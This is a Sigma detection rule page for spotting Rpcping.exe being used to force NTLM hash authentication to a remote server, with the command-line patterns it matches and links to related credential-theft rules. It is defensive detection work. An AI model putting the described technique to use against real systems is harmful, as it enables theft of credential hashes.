Capture Credentials with Rpcping.exe
Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Sigma rule (View on GitHub)
1title: Capture Credentials with Rpcping.exe
2id: 93671f99-04eb-4ab4-a161-70d446a84003
3status: test
4description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
5references:
6 - https://lolbas-project.github.io/lolbas/Binaries/Rpcping/
7 - https://twitter.com/vysecurity/status/974806438316072960
8 - https://twitter.com/vysecurity/status/873181705024266241
9 - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)
10author: Julia Fomina, oscd.community
11date: 2020-10-09
12modified: 2024-03-13
13tags:
14 - attack.credential-access
15 - attack.t1003
16logsource:
17 category: process_creation
18 product: windows
19detection:
20 use_rpcping:
21 Image|endswith: '\rpcping.exe'
22 remote_server:
23 CommandLine|contains|windash: '-s'
24 ntlm_auth:
25 - CommandLine|contains|all|windash:
26 - '-u'
27 - 'NTLM'
28 - CommandLine|contains|all|windash:
29 - '-t'
30 - 'ncacn_np'
31 condition: use_rpcping and remote_server and ntlm_auth
32falsepositives:
33 - Unlikely
34level: medium
References
-
Rpcping.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.
Read More
Related rules
- Access To Crypto Currency Wallets By Uncommon Applications
- Credential Manager Access By Uncommon Applications
- Esentutl Gather Credentials
- HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
- HackTool - Rubeus Execution